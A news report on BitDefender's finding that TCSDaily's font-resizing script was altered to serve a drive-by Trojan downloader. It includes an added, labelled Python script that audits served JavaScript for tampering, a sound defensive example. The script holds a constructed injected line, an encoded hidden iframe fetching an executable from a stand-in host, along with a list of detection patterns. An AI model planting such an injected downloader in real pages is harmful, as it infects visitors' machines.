BitDefender issued a warning today that an attacker has added an instruction to download an executable to a piece of previously innocuous JavaScript which handles font resizing, one that is included on every public-facing page of the TCSDaily news website.
The number of systems exposed to the attack suddenly spiked when a post linking to an article hosted on the compromised TCSDaily website appeared on the social news aggregator site Reddit.
The malicious JavaScript makes the user’s browser download and execute a Trojan, Trojan.Downloader.Small.BIB, which is hosted on a Chinese website that is probably also compromised.
“It’s a pretty simple piece of malware, but it’s obfuscated, so most antivirus programs could not detect it,” said Marius Tivadar, BitDefender antivirus researcher. “A drive-by download is like that – one often gets infected at first with something that is nearly innocuous and really stealthy, the kind of thing antivirus software is most likely to just ignore, but once your system is infected, all bets are off.”
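The attack described above, an injected downloader hidden in an otherwise legitimate script, is exactly the kind of change a site operator can catch by comparing the JavaScript actually served against a known-good copy and inspecting whatever was added. The script below is an added example, not BitDefender's tooling and not TCSDaily's real font-resizing file; the baseline script, the injected line and the download host example.invalid are all constructed for illustration. It diffs the served copy against the baseline, then matches the added lines against indicators that rarely belong in a UI helper, decoding one layer of percent-encoding first so that a payload wrapped in unescape() is inspected in clear rather than ignored because it is obfuscated.

```python
"""Audit a served JavaScript file against a known-good baseline copy.

Added as an illustration; not BitDefender's analysis tooling and not the
TCSDaily script. All inputs below are constructed.
"""
import difflib
import hashlib
import re
from urllib.parse import quote, unquote

# Constructed stand-in for a legitimate font-resizing script.
BASELINE_JS = """\
function setFontSize(px) {
  document.body.style.fontSize = px + 'px';
  document.cookie = 'fontsize=' + px + '; path=/';
}
function resizeFromCookie() {
  var m = document.cookie.match(/fontsize=(\\d+)/);
  if (m) { setFontSize(parseInt(m[1], 10)); }
}
"""

# Constructed injected line (hypothetical, not the real payload). example.invalid
# is a reserved, non-resolving name standing in for the unnamed download host.
INJECTED_JS = (
    "document.write(unescape('"
    + quote('<iframe src="http://example.invalid/x.exe" width=0 height=0></iframe>', safe="")
    + "'));\n"
)
SERVED_JS = BASELINE_JS + INJECTED_JS

# Indicators that rarely belong in a font-resizing helper. The last one flags
# long runs of %XX or \xXX escapes, a common sign of an encoded payload.
INDICATORS = [
    (re.compile(r"\beval\s*\("), "eval()"),
    (re.compile(r"\bunescape\s*\("), "unescape()"),
    (re.compile(r"String\.fromCharCode"), "String.fromCharCode"),
    (re.compile(r"document\.write\s*\("), "document.write()"),
    (re.compile(r"<\s*(?:iframe|object|embed)\b", re.I), "iframe/object/embed tag"),
    (re.compile(r"\.exe\b", re.I), ".exe reference"),
    (re.compile(r"(?:%[0-9a-fA-F]{2}){6,}|(?:\\x[0-9a-fA-F]{2}){6,}"), "long escaped run"),
]


def sha256(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def added_lines(baseline, served):
    """Lines present in the served copy but absent from the baseline."""
    diff = difflib.unified_diff(
        baseline.splitlines(), served.splitlines(), lineterm="", n=0
    )
    return [l[1:] for l in diff if l.startswith("+") and not l.startswith("+++")]


def indicators_in(line):
    """Match indicators against the raw line and against one layer of %XX
    decoding, so an unescape()'d payload is inspected in clear."""
    found = []
    for view in (line, unquote(line)):
        for rx, label in INDICATORS:
            if label not in found and rx.search(view):
                found.append(label)
    return found


def audit(baseline, served):
    """Return a report: whether the file hash matches, which lines were added,
    and which added lines carry suspicious indicators."""
    report = {
        "hash_match": sha256(baseline) == sha256(served),
        "added": added_lines(baseline, served),
        "findings": [],
    }
    for line in report["added"]:
        labels = indicators_in(line)
        if labels:
            report["findings"].append((line, labels))
    return report


if __name__ == "__main__":
    for name, served in (("clean copy", BASELINE_JS), ("tampered copy", SERVED_JS)):
        r = audit(BASELINE_JS, served)
        print(f"{name}: hash_match={r['hash_match']} added={len(r['added'])}")
        for line, labels in r["findings"]:
            print("  SUSPICIOUS:", ", ".join(labels))
            print("   ", line[:100])
```

The hash comparison alone tells an operator that the file changed; the diff and indicator pass tell them what changed and why it matters, which is what turns a routine integrity alert into a drive-by-download finding. In production the baseline would come from source control or a release artifact rather than a string in the script.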
The Trojan downloader itself fetches, from the same Chinese website, four further pieces of malware: a backdoor, a piece of adware, a password stealer and another Trojan, named respectively Backdoor.Poisonivy.M, Adware.Bho.WOX, Trojan.Pws.OnlineGames.AUD and Trojan.Agent.ADL.
Trojan.Agent.ADL also downloads yet more malware from yet another website.
“We were hot on the trail and finding new malware everywhere as the analysis proceeded,” said BitDefender antivirus researcher Mihai Calota, who had been tasked with charting out the threat. “It’s like diving into caves – there’s always this new nook which turns out to be a passage to a new room.”